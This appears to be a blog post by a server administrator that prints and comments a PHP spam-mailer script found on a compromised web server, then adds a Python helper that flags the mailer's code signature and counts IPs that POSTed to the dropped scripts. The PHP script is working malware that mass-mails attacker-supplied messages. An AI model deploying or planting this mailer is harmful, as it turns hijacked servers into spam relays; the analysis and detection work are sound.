I found this piece of PHP malware code on a compromised web server that I had just started to administer. Its name was a random character string, e.g. acbjxuu.php. There were about 20 more scripts of this kind. It's a rather simple script for spamming purposes. To help you understand it, I've written what it does in comments between the code lines.
<?php
if (isset($_POST['task'])) {
    // be sure to display all PHP errors
    error_reporting(E_ALL);
    ini_set('display_errors', TRUE);

    // raise the default PHP memory limit
    ini_set('memory_limit', '512M');

    // disable the PHP execution time limit
    set_time_limit(0);
    ini_set('max_execution_time', 0);
    ini_set('set_time_limit', 0); // not a real ini directive, this call has no effect

    // get the serialized array from the POST variable named task
    // example array structure:
    // array(array('to'=>'[email protected]', 'msg'=>'message content', 'subj'=>'Message subject, e.g. cheap cialis :)'));
    $x = unserialize(base64_decode($_POST['task']));

    // if the task variable was wrongly serialized, just die silently...
    if ($x == false) {
        exit();
    }

    // URL of this script, substituted into each message body below
    $send_from = base64_encode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);

    // now send half a million viagra & cialis related mails...
    foreach ($x as $arr) {
        echo $arr['to'] . "\r\n";
        $arr['msg'] = str_replace('[send_from_url]', $send_from, $arr['msg']);
        mail($arr['to'], $arr['subj'], $arr['msg'],
             "MIME-Version: 1.0\r\nContent-type: text/html; charset=windows-1251\r\n");
    }
    exit('SEND OK');
}
I'll look in the logs for IP addresses that tried to reach these scripts. Maybe I'll find something interesting. Wish me good luck, and monitor your web server's contents!
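As an added example (not part of the original post), here is a small Python triage helper for exactly the two things mentioned above: finding other copies of a mailer like this on disk, and pulling the client IPs that POSTed to the dropped scripts out of the access log. The file-scan flags a PHP source that combines the mailer's tell-tale calls (unserialize(base64_decode($_POST...)), set_time_limit(0) and mail()), and the log triage counts POSTs to known script names or to names that look machine-generated. The log lines, file names and sample sources are constructed for the example, and the "random name" heuristic (6-12 lowercase letters with a run of three or more consonants) is an assumption that will need tuning for any real site.

```python
"""Triage helpers for a PHP spam mailer like the one above.
scan_php_source() flags sources that combine the mailer's indicators;
triage_access_log() counts client IPs that POSTed to dropped scripts.
All sample data below is constructed for this example."""
import re
from collections import Counter

# Indicators taken from the script above: a serialized, base64-encoded task
# read straight from POST, the execution limit lifted, and mail() being called.
INDICATORS = {
    "unserialize_post": re.compile(
        r"unserialize\s*\(\s*base64_decode\s*\(\s*\$_POST", re.I),
    "no_time_limit": re.compile(r"set_time_limit\s*\(\s*0\s*\)", re.I),
    "mail_call": re.compile(r"\bmail\s*\(", re.I),
}


def scan_php_source(src, min_hits=2):
    """Return the indicator names found in src, or [] if fewer than min_hits match.
    Requiring two hits keeps ordinary contact forms (mail() alone) out of the list."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(src)]
    return hits if len(hits) >= min_hits else []


# Apache/nginx combined format: ip ident user [ts] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')


def looks_dropped(path):
    """Heuristic (assumption, not from the post): a bare lowercase name of 6-12
    letters directly in the web root, with a consonant run of 3+ letters, which
    random strings such as acbjxuu tend to have and English words rarely do."""
    m = re.fullmatch(r"/([a-z]{6,12})\.php", path)
    if not m:
        return False
    runs = re.findall(r"[^aeiou]+", m.group(1))
    return max((len(r) for r in runs), default=0) >= 3


def triage_access_log(lines, known=()):
    """Count client IPs that POSTed to a known dropped script or a
    suspiciously named one; GETs and normal paths are ignored."""
    counts = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = m["path"].split("?", 1)[0]
        if path in known or looks_dropped(path):
            counts[m["ip"]] += 1
    return counts


# Constructed sample inputs.
SAMPLE_MAILER = (
    "set_time_limit(0);\n"
    "$x = unserialize(base64_decode($_POST['task']));\n"
    "foreach ($x as $arr) { mail($arr['to'], $arr['subj'], $arr['msg']); }\n")
SAMPLE_CONTACT_FORM = (
    "if (!empty($_POST['email'])) { mail('[email protected]', 'Contact', $msg); }\n")
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2013:03:12:01 +0100] "POST /acbjxuu.php HTTP/1.1" 200 312 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [10/Mar/2013:03:12:09 +0100] "POST /qwjrtyk.php HTTP/1.1" 200 298 "-" "Mozilla/4.0"',
    '198.51.100.4 - - [10/Mar/2013:03:15:44 +0100] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Mar/2013:03:16:02 +0100] "POST /contact.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [10/Mar/2013:04:01:13 +0100] "POST /acbjxuu.php HTTP/1.1" 200 305 "-" "-"',
]

if __name__ == "__main__":
    print("mailer indicators:", scan_php_source(SAMPLE_MAILER))
    print("contact form indicators:", scan_php_source(SAMPLE_CONTACT_FORM))
    for ip, n in triage_access_log(SAMPLE_LOG, known={"/acbjxuu.php"}).most_common():
        print(f"{ip}: {n} POST(s) to dropped scripts")
```

Run it over the real web root (for example, feeding each .php file's contents to scan_php_source) and over the rotated access logs; the IPs with the most hits are the spam controller's submitters, and any other script they POSTed to is worth reading next.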